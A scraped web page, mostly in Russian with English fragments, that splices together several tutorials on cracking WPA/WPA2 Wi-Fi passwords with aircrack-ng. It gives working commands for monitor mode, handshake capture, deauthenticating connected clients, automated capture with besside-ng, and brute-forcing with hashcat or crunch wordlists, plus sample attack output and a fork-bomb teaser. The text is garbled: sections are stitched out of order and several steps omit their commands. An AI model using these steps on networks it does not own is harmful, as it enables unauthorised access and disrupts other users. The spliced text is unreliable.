Андрей Смирнов
Время чтения: ~34 мин.
Просмотров: 1

Aireplay-ng

Airodump-ng: Authentication Handshake

Cool Tip: Want to have some “fun”? Create a Linux fork bomb! One small string that is able to hang the whole system! Read more →

Now, when our wireless adapter is in monitor mode, we have a capability to see all the wireless traffic that passes by in the air.

This can be done with the command:

$ sudo airodump-ng mon0

All of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen:

CH 1 ][ 2014-05-29 12:46

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:11:22:33:44:55  -48      212     1536   66   1  54e  WPA2 CCMP   PSK  CrackMe
66:77:88:99:00:11  -64      134     345   34   1  54e  WPA2 CCMP   PSK  SomeAP

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -44    0 - 1    114       56
00:11:22:33:44:55  GG:HH:II:JJ:KK:LL  -78    0 - 1      0       1
66:77:88:99:00:11  MM:NN:OO:PP:QQ:RR  -78    2 - 32      0       1

Start the on AP channel with the filter for BSSID to collect the authentication handshake for the access point we are interested in:

$ sudo airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w WPAcrack mon0 --ignore-negative-one
OptionDescription
The channel for the wireless network
The MAC address of the access point
The file name prefix for the file which will contain authentication handshake
The wireless interface
Fixes the ‘fixed channel : -1’ error message

If you want to speed up this process – go to the step #4 and try to force wireless client reauthentication.

After some time you should see the in the top right-hand corner of the screen.

This means that the has successfully captured the handshake:

CH 1 ][ 2014-05-29 12:46  WPA handshake: 00:11:22:33:44:55

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:11:22:33:44:55  -48      212     1536   66   1  54e  WPA2 CCMP   PSK  CrackMe

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -44    0 - 1    114       56

Using Hashcat generated passwords in Aircrack-ng

In order not to crack passwords, but only to show candidates, Hashcat has an option —stdout

We also need to specify the hacking mode (option -a) and the mask itself.

  # | Mode
 ===+======
  0 | Straight
  1 | Combination
  3 | Brute-force
  6 | Hybrid Wordlist + Mask
  7 | Hybrid Mask + Wordlist

-  -

  ? | Charset
 ===+=========
  l | abcdefghijklmnopqrstuvwxyz
  u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
  d | 0123456789
  h | 0123456789abcdef
  H | 0123456789ABCDEF
  s |  !"#$%&'()*+,-./:;<=>?@^_`{|}~
  a | ?l?u?d?s
  b | 0x00 - 0xff

As a result, the command to display passwords looks like this:

hashcat --stdout -a 3 pattaya?l?l?l?l

Where:

  • —stdout means only show passwords candidates.
  • -a 3 means that mask attack is selected
  • pattaya?l?l?l?l is the mask itself. All passwords created at the beginning of the word will have pattaya, and then there will be four small letters. It is recommended that you familiarize yourself with the rules for creating masks for Hashcat: https://en.kali.tools/?p=155

The command to transfer generated passwords from hashcat to aircrack-ng for my data looks like this:

hashcat --stdout -a 3 pattaya?l?l?l?l | aircrack-ng -w - -e dlink dlink-02.cap

Hacking Wi-Fi in Aircrack-ng with Crunch-generated passwords on the fly

Crunch is a dictionary generator with passwords in which you can define a standard or specified encoding. Crunch can create a list of words with all sorts of combinations and permutations in accordance with specified criteria. The data that crunch prints can be displayed on the screen, saved to a file, or transferred to another program.

A simple example of use:

crunch <minimum-length> <maximum-length> 

In general, Crunch is a very flexible program, and in order to use it 100% you need to study its options and familiarize yourself with the examples. You can find various examples of crunch usage on the page: https://en.kali.tools/?p=182

For my case it would be possible to do this:

crunch 11 11 -t pattaya@@@@ | aircrack-ng -w - -e dlink dlink-02.cap

Or so:

crunch 11 11 -t @@@@@@@@@@@ | aircrack-ng -w - -e dlink dlink-02.cap

Примеры запуска Besside-ng

Переводим беспроводную карту (wlan0) в режим монитора:

root@HackWare:~# ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up

Запускаем besside-ng на интерфейсе wlan0:

root@HackWare:~# besside-ng wlan0
 Let's ride
 Logging to besside.log
 TO-OWN  OWNED []
 Got necessary WPA handshake info for Kitty
 Run aircrack on wpa.cap for WPA key
 Pwned network Kitty in 0:02 mins:sec
 TO-OWN  OWNED 
 Crappy connection - num unreachable got 0/10 (100% loss) 
 Got necessary WPA handshake info for Mial
 Run aircrack on wpa.cap for WPA key
 Pwned network Mial in 0:01 mins:sec
 TO-OWN  OWNED 
 Crappy connection - Hailsham unreachable got 0/10 (100% loss) 
 TO-OWN  OWNED 
 TO-OWN  OWNED 
 TO-OWN  OWNED 
 TO-OWN  OWNED 
 TO-OWN  OWNED 
 TO-OWN  OWNED 
 Got necessary WPA handshake info for DANIELLE2015
 Run aircrack on wpa.cap for WPA key
 Pwned network DANIELLE2015 in 4:50 mins:sec
 TO-OWN  OWNED 
 TO-OWN  OWNED 
 TO-OWN  OWNED 
 TO-OWN  OWNED 
 TO-OWN  OWNED 
 TO-OWN  OWNED 
 TO-OWN  OWNED 
 / Attacking  WPA - DEAUTH (know 3 clients)
…........................................

Содержимое лог файла (besside.log):

# SSID              | KEY                                    | BSSID             | MAC filter
Kitty               | Got WPA handshake                      | 4c:72:b9:fe:b8:0c | 
DANIELLE2015        | Got WPA handshake                      | 0c:54:a5:c0:24:d6 | 
Mial                | Got WPA handshake                      | 20:25:64:16:58:8c | 

Fragmentation Versus Chopchop

Fragmentation:

Pros

— Can obtain the full packet length of 1500 bytes XOR. This means you can subsequently pretty well create any size of packet.
— May work where chopchop does not
— Is extremely fast. It yields the XOR stream extremely quickly when successful.

Cons

— Setup to execute the attack is more subject to the device drivers. For example, Atheros does not generate the correct packets unless the wireless card is set
to the mac address you are spoofing.
— You need to be physically closer to the access point since if any packets are lost then the attack fails.

Chopchop

Pro

— May work where frag does not work.

Cons

— Cannot be used against every access point.
— The maximum XOR bits is limited to the length of the packet you chopchop against.
— Much slower then the fragmentation attack.

Как пользоваться Aircrack-ng для взлома WPA

Дальше рассмотрим как пользоваться aircrack-ng. Если программа еще не установлена на вашем компьютере, то в Linux вы можете скачать ее из официальных репозиториев. В Ubuntu:

sudo apt install aircrack-ng

А в Red Hat / CentOS:

sudo yum install aircrack-ng

Windows вам придется загрузить установщик из официального сайта. После установки первым делом нужно сделать чтобы нам ничего не мешало. Для этого отключите все сервисы, которые управляют Wifi и тем более отключитесь от Wifi сети, если вы к ней подключены. Если запущен NetworkManager, его нужно отключить:

sudo systemctl stop NetworkManager

Я предполагаю, что у вас уже установлены все необходимые драйвера и вы готовы к работе. Сначала смотрим подключенные к системе интерфейсы:

sudo ls /sys/class/net/

Обычно имя беспроводного интерфейса начинается на w, например, wlp3s0 или wlan0. У меня это wlp3s0b1. Нам нужно перевести сетевой интерфейс WiFi в режим мониторинга. В этом режиме он может захватывать все пакеты, которые летают в сети и даже если ему они не адресованы ему. Вообще, интерфейс и так захватывает все пакеты, но на программном уровне все пакеты, которые не адресованы этому компьютеру отсеиваются, теперь они не будут отсеиваться. Дальше идет инструкция Aircrack-ng.

Для этого воспользуемся утилитой airmon-ng. Ей нужно передать команду start и имя интерфейса:

sudo airmon-ng start wlp0s0b1

После этого будет создан виртуальный интерфейс, который работает в режиме монитора во второй колонке отображено его имя, у меня это wlp3s0b1mon, хотя часто он называется просто mon0. Если какие-либо программы будут мешать программа выдаст их имена и PID:

Их нужно завершить с помощью kill. Дальше нам нужно просканировать эфир и найти нашу сеть, которую мы собираемся тестировать. Для этого используйте команду airodump-ng. В параметрах ей нужно передать только интерфейс

Обратите внимание, что нужно передавать именно виртуальный интерфейс, который работает в режиме монитора:

sudo airodump-ng -i wlp3s0b1mon

Почти сразу же вы увидите свою сеть, поскольку она расположена ближе всех. У меня это MyPublicWifi423. Из предоставляемой информации нам понадобится ее BSSID и канал, который можно найти в колонке CH. Дальше мы будем использовать ту же самую утилиту, только теперь нацелим ее именно на нашу сеть, чтобы она не отвлекалась на посторонние и поймала все что нам нужно.

Мы зададим канал с помощью опции -с и BSSID роутера с помощью опции —bssid, а также укажем с помощью опции -w куда нужно сохранить перехваченные пакеты для дальнейшей обработки:

sudo airodump-ng -c 11 –bssid 56:0A:64:17:5D:33 -w /home/sergiy/hack.pcap wlp3s0b1mon

Не закрывайте этот терминал, сейчас выполняется захват и как вы можете видеть к нашей сети подключено два пользователя. Их MAC адреса находятся в колонке STATION. Если сейчас один из них отключится и еще раз подключится, то мы получим необходимые для дальнейшего взлома данные.

Мы можем это сделать со своими устройствами, но в реальной сети у хакера не будет такой возможности, поэтому мы можем принудительно отключить клиента от сети с помощью утилиты aireplay. Если передать ей опцию deauth, то она разошлет широковещательное сообщение от имени маршрутизатора, в котором попросит всех отключиться от сети. Нам нужно только передать в параметрах количество пакетов, которые нужно отправить и BSSID роутера:

sudo aireplay-ng –deauth 10 -a 56:0A:64:17:5D:33 wlp3s0b1mon

Сразу после этого вы сразу же увидите, сообщение WPA handshake: 56:0A:64:17:5D:33 в правом верхнем углу терминала. Вы можете использовать и более простой способ для получения Handshake. Утилита besside позволяет выполнить все действия автоматически нужно только передать BSSID роутера и интерфейс монитора:

sudo besside-ng -b 02:C2:C6:46:39:85 wlp3s0b1mon

Этап, связанный с работой в реальной сети завершен и нам осталось только перебрать все возможные пароли по словарю. Дальше рассмотрим как пользоваться Aircrack-ng для перебора паролей.

Словарь — это обычный текстовый документ со списком возможных паролей. Вы можете составить его сами. Команда будет выглядеть следующим образом:

$ sudo aircrack-ng -b BSSID_маршрутизатора -w путь_к_словарю перехваченные_пакеты

sudo aircrack-ng –bssid 56:0A:64:17:5D:33 -w /home/sergiy/words /home/sergiy/hack.pcap-01.cap

Дальше начнется перебор ключей и если ключ, который использовался для защиты сети есть в списке, то он обязательно будет найден:

Поэтому никогда не используйте простые пароли, состоящие только из цифр, если вы добавите хоть одну букву или символ, то уменьшите шансы на взлом в несколько раз.

необходимо зарегистрироваться, для того что бы оставить комментарий

Requirements

  • Autoconf
  • Automake
  • Libtool
  • shtool
  • OpenSSL development package or libgcrypt development package.
  • Airmon-ng (Linux) requires ethtool, usbutils, and often pciutils.
  • On windows, cygwin has to be used and it also requires w32api package.
  • On Windows, if using clang, libiconv and libiconv-devel
  • Linux: LibNetlink 1 or 3. It can be disabled by passing —disable-libnl to configure.
  • pkg-config (pkgconf on FreeBSD)
  • FreeBSD, OpenBSD, NetBSD, Solaris and OS X with macports: gmake
  • Linux/Cygwin: make and Standard C++ Library development package (Debian: libstdc++-dev)

Note: Airmon-ng only requires pciutils if the system has a PCI/PCIe bus and it is populated.
Such bus can be present even if not physically visible. For example, it is present,
and populated on the Raspberry Pi 4, therefore pciutils is required on that device.

Airmon-ng: Monitor Mode

Monitor mode allows a computer with a wireless network interface to monitor all traffic received from the wireless network.

What is especially important for us – monitor mode allows packets to be captured without having to associate with an access point.

Find and stop all the processes that use the wireless interface and may cause troubles:

$ sudo airmon-ng check kill

Start the wireless interface in monitor mode:

$ sudo airmon-ng start wlan0
Interface	Chipset		Driver

wlan0		Intel 6235	iwlwifi - 
				(monitor mode enabled on mon0)

In the example above the has created a new wireless interface called and enabled on it monitor mode.

So the correct interface name to use in the next parts of this tutorial is the .

10 ответов

12

Вы можете установить его с помощью brew

Или используя порт

6

После многих разочарований в этой же проблеме я нашел способ фактически использовать Airodump на моем терминале Mac. Я понял, что все файлы, которые я могу успешно выполнить, находятся в пути к каталогу

/usr /local /bin /

И получается, что Airodump был на самом деле на моем компьютере, он просто был сохранен в пути

/USR /местные /SBIN

И я не смог выполнить его с этого пути. Все, что я сделал, это переместить Airodump из пути /usr /local /sbin в путь /usr /local /bin, и теперь он отлично работает! Я сошел с ума в течение нескольких часов, и это было так просто.

3

Вы можете легко установить с помощью homebrew

Do

Тогда do

для установки или обновления airodump-ng

2

Поскольку у меня нет работающего linix-бокса, в настоящее время я не в курсе возможностей aircrack-ng

KisMac — более старый порт Kismet, последний выпущенный в 2006 году, но сообщил о работе над Snow Leopard. Не пробовал.

Другим возможным полезным инструментом является WireShark. Вам нужно будет установить XQuartz, чтобы использовать его, так как это приложение для Windows X11.

Последняя возможность — установить окна под VirtualBox, Parallels или VMFusion и предоставить им полный доступ к вашим сетевым картам.

Основываясь на пояснении в вашем комментарии, я думаю, что wirehark будет делать то, что вы хотите, если хотите посмотреть трафик.

Если вы просто хотите считать пакеты, вы можете использовать netstat. Это терминальная программа.
(см. man netstat)

-w10 дает вам запись каждые 10 секунд. Если вам нужны почасовые записи, вы должны использовать -w3600.

Netstat — это общее назначение. Если у вас несколько интерфейсов, вы можете отфильтровать данный флаг с -I. Вы также можете выполнять фильтрацию по протоколу, семейству адресов.

Если вам нужна серьезная фильтрация (я хочу знать, сколько пакетов bitorrent отправлено в пиратский отсек на прошлой неделе), вам понадобится либо wirehark, либо tcpdump. (Tcpdump — это командная строка) Wireshark — это в основном графический интерфейс поверх tcpdump. Оба имеют свое место.

1

Я использую aircrack-ng на своем mac, от терминала, не подражая другой ОС. Вот хорошая страница, в которой упоминается отношение к другим инструментам, которые, я думаю, могут вам помочь: http://easymactips.blogspot.com/2010/10/how-to-install-aircrack-on-mac.html

Кстати, может быть, у вас уже есть в системе то, что вы ищете: скрытый в вашем аэропорту, от yosemite on, сниффер. Нажмите опцию и значок Wi-Fi, вы увидите опцию беспроводной диагностики. Команда 4 сканирует (вы видите сети, каналы, MAC-адреса и другие данные), а команда 6 — сниффер. Дайте тоже попробовать. С наилучшими пожеланиями.

1

Обратите внимание, что команда также будет захватывать пакеты в файл, чтобы можно было просто использовать аэропорт для захвата, а затем открыть файл в Wireshark или просто выйти из команды аэропорта после того, как вы запустили захват режима монитора и позволили Wireshark собрать их, чтобы вы могли видеть их в реальном времени. На самом деле можно изменить канал захвата, пока работает Wireshark, но вы можете пропустить пакеты, пока происходит изменение канала

1

  1. Захват беспроводного трафика с помощью :

    sudo tshark -i en1 -I -w wlan.pcap

  2. Анализ захвата с помощью :

    pyrit -r wlan.pcap анализ

Он имеет инструкции по установке aircrack-ng на Mac.
На веб-сайте:

Среди прочего:

  • Показывает вход в систему клиентов
  • Можно захватить пакеты (возможно экспорт PCAP)
  • Показывает скрытые SSID
  • Может выполнять различные атаки, такие как «атака деаутентификации»

Они связывают файл zipped в конце файла README: KisMac2.zip .

Как будет работать атака на WPA/WPA2?

Как я уже говорил протокол шифрования беспроводных сетей WPA тоже имеет свои недочеты. Но большинство из них усугубляет именно пользователь. Если не учитывать недавно открытую уязвимость в работе WPA TKIP, то все остальные проблемы возникают из-за слабого пароля.

Для нашей тестовой атаки будем использовать собственную сеть. Предполагается, что вы к ней не подключены. Рассмотрим в чем состоит суть атаки. Для того чтобы подключиться к сети каждый клиент должен пройти процесс аутентификации с роутером. Я не буду вдаваться в подробности, но между клиентом и маршрутизатором выполняются четыре проверки подлинности на основе MAC адреса, ключа и случайных чисел, если мы их перехватим, то сможем уже на локальном компьютере попробовать перебрать подходящий пароль уже на локальном компьютере.

Суть метода в том, что скорость перебора на компьютере будет намного быстрее, чем при ручной проверке, она будет достигать до 1000 паролей в секунду, а при использовании очень простого и ожидаемого пароля, его можно очень быстро перебрать.

Сначала мы переведем устройство в режим монитора с помощью airmon-ng, затем будем перехватывать все пакеты от этой сети с помощью airodump-ng пока не найдем рукопожатие, затем останется перебрать пароль по словарю с помощью aircrack. А теперь перейдем ближе к практике и рассмотрим насколько просто перебрать ваш пароль если он достаточно простой.

Optional stuff

  • If you want SSID filtering with regular expression in airodump-ng
    (-essid-regex) pcre development package is required.
  • If you want to use airolib-ng and ‘-r’ option in aircrack-ng,
    SQLite development package >= 3.3.17 (3.6.X version or better is recommended)
  • If you want to use Airpcap, the ‘developer’ directory from the CD/ISO/SDK is required.
  • In order to build , , , and ,
    libpcap development package is required (on Cygwin, use the Aircap SDK instead; see above)
  • For best performance on FreeBSD (50-70% more), install gcc5 (or better) via: pkg install gcc9
  • rfkill
  • If you want Airodump-ng to log GPS coordinates, gpsd is needed
  • For best performance on SMP machines, ensure the hwloc library and headers are installed. It is strongly recommended on high core count systems, it may give a serious speed boost
  • CMocka for unit testing
  • For intergation testing on Linux only: tcpdump, HostAPd, WPA Supplicant and screen

Airodump-ng Package Description

Airodump-ng is included in the aircrack-ng package and is used for packet capturing of raw 802.11 frames. It is ideal for collecting WEP IVs for use with aircrack-ng. If you have a GPS receiver connected to the computer, airodump-ng can log the coordinates of the discovered access points.

  • Author: Thomas d’Otreppe, Original work: Christophe Devine
  • License: GPLv2
airodump-ng – a wireless packet capture tool for aircrack-ng

root@kali:~# airodump-ng —help
  Airodump-ng 1.5.2 — (C) 2006-2018 Thomas d’Otreppe
  https://www.aircrack-ng.org
  usage: airodump-ng <options> <interface>
  Options:
      —ivs                 : Save only captured IVs
      —gpsd                : Use GPSd
      —write      <prefix> : Dump file prefix
      -w                    : same as —write
      —beacons             : Record all beacons in dump file
      —update       <secs> : Display update delay in seconds
      —showack             : Prints ack/cts/rts statistics
      -h                    : Hides known stations for —showack
      -f            <msecs> : Time in ms between hopping channels
      —berlin       <secs> : Time before removing the AP/client
                              from the screen when no more packets
                              are received (Default: 120 seconds)
      -r             <file> : Read packets from that file
      -x            <msecs> : Active Scanning Simulation
      —manufacturer        : Display manufacturer from IEEE OUI list
      —uptime              : Display AP Uptime from Beacon Timestamp
      —wps                 : Display WPS information (if any)
      —output-format
                  <formats> : Output format. Possible values:
                              pcap, ivs, csv, gps, kismet, netxml, logcsv
      —ignore-negative-one : Removes the message that says
                              fixed channel <interface>: -1
      —write-interval
                  <seconds> : Output file(s) write interval in seconds
      —background <enable> : Override background detection.
  Filter options:
      —encrypt   <suite>   : Filter APs by cipher suite
      —netmask <netmask>   : Filter APs by mask
      —bssid     <bssid>   : Filter APs by BSSID
      —essid     <essid>   : Filter APs by ESSID
      —essid-regex <regex> : Filter APs by ESSID using a regular
                              expression
      -a                    : Filter unassociated clients
  By default, airodump-ng hops on 2.4GHz channels.
  You can make it capture on other/specific channel(s) by using:
      —ht20                : Set channel to HT20 (802.11n)
      —ht40-               : Set channel to HT40- (802.11n)
      —ht40+               : Set channel to HT40+ (802.11n)
      —channel <channels>  : Capture on specific channels
      —band <abg>          : Band on which airodump-ng should hop
      -C    <frequencies>   : Uses these frequencies in MHz to hop
      —cswitch  <method>   : Set channel switching method
                    0       : FIFO (default)
                    1       : Round Robin
                    2       : Hop on last
      -s                    : same as —cswitch
      —help                : Displays this usage screen

airodump-ng Usage Examples

Monitor all wireless networks, frequency hopping between all wireless channels.

root@kali:~# airodump-ng wlan0mon
CH  8 ][ 2018-11-22 13:44                                        
                                                                                                                                                                                                                 
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                                                                                 
54:A0:50:DA:7B:98  -76        1        0    0   1  54e  WPA2 CCMP   PSK  RTINC-24                                                                                                                                
FC:15:B4:CF:0A:55  -70        2        0    0   6  54e. WPA2 CCMP   PSK  HP-Print-55-ENVY 4500 series                                                                                                            
A8:4E:3F:73:DD:88  -67        3        0    0   6  720  WPA2 CCMP   PSK  WAT-73DD80                                                                                                                            
4C:8B:30:83:ED:91  -71        2        0    0   1  54e  WPA2 CCMP   PSK  TELL-US-2.4G                                                                                                                          
4C:8B:30:D7:09:41  -76        2        0    0   1  54e  WPA2 CCMP   PSK  SAMUELL-2.4G                                                                                                                            
FA:8F:CA:89:90:39  -82        2        0    0   1  135  OPN              Raymond’s TV.e102                                                                                                                      
AC:20:2E:CD:F4:88  -85        0        0    0   6  54e. WPA2 CCMP   PSK  BELL-CDF480                                                                                                                              
10:78:5B:2A:A1:21  -80        2        0    0   6  54e  WPA2 CCMP   PSK  COGECO-2.4G                                                                                                                          
                                                                                                                                                                                                                 
BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                                                                        
                                                                                                                                                                                                                 
(not associated)   8C:85:90:0C:C5:D0  -44    0 — 1      1        5                                                                                                                                                
(not associated)   A0:63:91:43:C2:D5  -70    0 — 1      0        1  TT-D59979                                                                                                                                  
(not associated)   14:91:82:04:D9:74  -43    0 — 1      0        1  1

Sniff on channel 6 (-c 6) via monitor mode interface wlan0mon and save the capture to a file (-w /root/chan6).

root@kali:~# airodump-ng -c 6 -w /root/chan6 wlan0mon
CH  6 ][ 2017-11-12 13:49                                        
                                                                                                                                                                                                                 
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                                                                                 
BC:4D:FB:2C:6D:88  -68  28        9        3    0   6  54e. WPA2 CCMP   PSK  BELL-CDF4800                                                                                                                        
A8:4E:3F:73:DD:88  -74  33       19        0    0   6  54e. WPA2 CCMP   PSK  COGECO-2.4G                                                                                                                        
FC:15:B4:CF:0A:55  -77  61       31        0    0   6  54e. WPA2 CCMP   PSK  HP-Print-55-ENVY 4500 series

Filter for access points by a specific manufacturer, specifying the OUI and mask (-d FC:15:B4:00:00:00 -m FF:FF:FF:00:00:00).

root@kali:~# airodump-ng -d FC:15:B4:00:00:00 -m FF:FF:FF:00:00:00 wlan0mon
CH 14 ][ 2018-11-22 13:53                                        
                                                                                                                                                                                                                 
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                                                                                 
FC:15:B4:CF:0A:55  -76        9        0    0   6  54e. WPA2 CCMP   PSK  HP-Print-55-ENVY 4500 series                                                                                                            
                                                                                                                                                                                                                 
BSSID              STATION            PWR   Rate    Lost    Frames  Probe

Aircrack-ng: Download and Install

The Latest Version Only: If you really want to hack WiFi – do not install the old from your OS repositories. Download and compile the latest version manually.

Install the required dependencies:

$ sudo apt-get install build-essential libssl-dev libnl-3-dev pkg-config libnl-genl-3-dev

Download and install the latest ():

$ wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc4.tar.gz  -O - | tar -xz
$ cd aircrack-ng-1.2-rc4
$ sudo make
$ sudo make install

Ensure that you have installed the latest version of :

$ aircrack-ng --help

  Aircrack-ng 1.2 rc4 - (C) 2006-2015 Thomas d'Otreppe
  http://www.aircrack-ng.org

Подбор пароля Wi-Fi утилитой aircrack-ng

Введение

В начале 1990-х годов, когда Wi-Fi только появился, был создан алгоритм Wired Equivalent Privacy, который должен был обеспечивать конфиденциальность Wi-Fi сетей. Однако, WEP оказался неэффективным алгоритмом защиты, который легко взломать.

На смену пришел новый алгоритм защиты Wi-Fi Protected Access II, который сегодня применяют большинство точек доступа Wi-Fi. WPA2 использует алгоритм шифрования, AES, взломать который крайне сложно.

А где же уязвимость?

Недостаток WPA2 заключается в том, что зашифрованный пароль передается при подключении пользователей во время так называемого 4-way handshake (4-х стороннего рукопожатия). Если мы поймаем handshake, то узнаем зашифрованный пароль и нам останется лишь расшифровать его. Для этой цели мы воспользуемся aircrack-ng.

Шаг 1. Определяем интерфейс

Для начала нужно узнать, какой сетевой интерфейс нам нужен, для этого вводим команду:

В моем случае всего три интерфейса, два из которых не имеют беспроводных расширений (no wireless extensions). Поэтому нас интересует только wlan0.

Шаг 2. Переводим сетевой адаптер в режим мониторинга

Перевод сетевого адаптера в режим мониторинга позволит нам видеть беспроводной трафик, подходящий рядом с нами. Для того чтобы сделать это, вводим команду:

Обратите внимание, что airmon-ng переименовал ваш интерфейс (у меня он стал называться mon0, но вам, все же, стоит проверить)

Шаг 3. Перехватываем трафик

Теперь, когда наш сетевой адаптер находится в режиме мониторинга, мы можем захватить, подходящий мимо нас трафик, используя команду airodump-ng. Вводим:

Обратите внимание, что все видимые точки доступа перечислены в верхней части экрана, а клиенты — в нижней части экрана

Шаг 4. Концентрируем перехват на конкретной точке доступа.

Наш следующий шаг — сосредоточить наши усилия на одной из точек доступа и на ее канале. Нас интересует BSSID и номер канала точки доступа, которую мы будем взламывать. Давайте откроем еще один терминал и введем:

  • 08:86:30:74:22:76 BSSID точки доступа
  • -c 6 канал на котором работает точка доступа Wi-Fi
  • WPAcrack файл в который запишется handshake
  • mon0 сетевой адаптер в режиме мониторинга

Как вы можете видеть на скриншоте выше, мы сейчас концентрируемся на захвате данных с одной точки доступа с ESSID Belkin276 на канале 6. Терминал оставляем открытым!

Шаг 5. Получение handshake

Чтобы захватить зашифрованный пароль, нам нужно, чтобы клиент прошел аутентификацию (подключился к Wi-Fi). Если он уже аутентифицирован, мы можем его деаутентифицировать (отключить), тогда система автоматически повторно аутентифицируется (подключится), в результате чего мы можем получить зашифрованный пароль.

То есть нам просто нужно отключить подключенных пользователей, чтобы они подключились снова. Для этого открываем ещё один терминал и вводим:

  • 100 количество пользователей, которые будут деаутентифицированы
  • 08:86:30:74:22:76 BSSID точки доступа
  • mon0 сетевой адаптер

Теперь при повторном подключении окно которое мы оставили на предыдущем шаге поймает handshake. Давайте вернемся к нашему терминалу airodump-ng и посмотрим.

Обратите внимание на верхнюю строку справа, airodump-ng вывел: «Handshake WPA». То есть, мы успешно захватили зашифрованный пароль! Это первый шаг к успеху!

Шаг 6. Подбираем пароль

Теперь, когда у нас есть зашифрованный пароль в нашем файле WPAcrack, мы можем запустить подбор пароля. Но для этого нам нужно иметь список с паролями которые мы хотим использовать. Найти такой список можно за 5 минут в Гугле. Я, же, буду использовать список паролей по умолчанию, включенный в aircrack-ng: BackTrack darkcOde.

Открываем новый терминал и вводим:

  • WPAcrack-01.cap файл в который мы записывали handshake (airodump-ng приписал в конце -01.cap)
  • /pentest/passwords/wordlist/darkc0de абсолютный путь к списку паролей

Сколько времени это займёт?

Этот процесс может занять много времени. Все зависит от длины вашего списка паролей, вы можете ждать от нескольких минут до нескольких дней. На моем двухъядерном процессоре Intel aircrack-ng подбирает чуть более 800 паролей в секунду.

Когда пароль будет найден, он появится на вашем экране. Будет ли подбор пароля успешным или нет, зависит от вашего списка. Если у вас не получилось подобрать пароль по одному списку, не отчаивайтесь, попробуйте другой.

Рейтинг автора
5
Материал подготовил
Максим Иванов
Наш эксперт
Написано статей
129
Ссылка на основную публикацию
Похожие публикации